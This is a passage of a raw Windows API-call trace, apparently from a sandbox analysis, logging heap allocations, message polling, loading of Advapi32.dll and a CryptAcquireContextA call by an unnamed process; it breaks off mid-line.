RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.546] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.547] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0117.547] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0117.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.548] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.548] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0117.548] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.548] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.549] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0117.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0117.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.553] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.554] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.554] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: 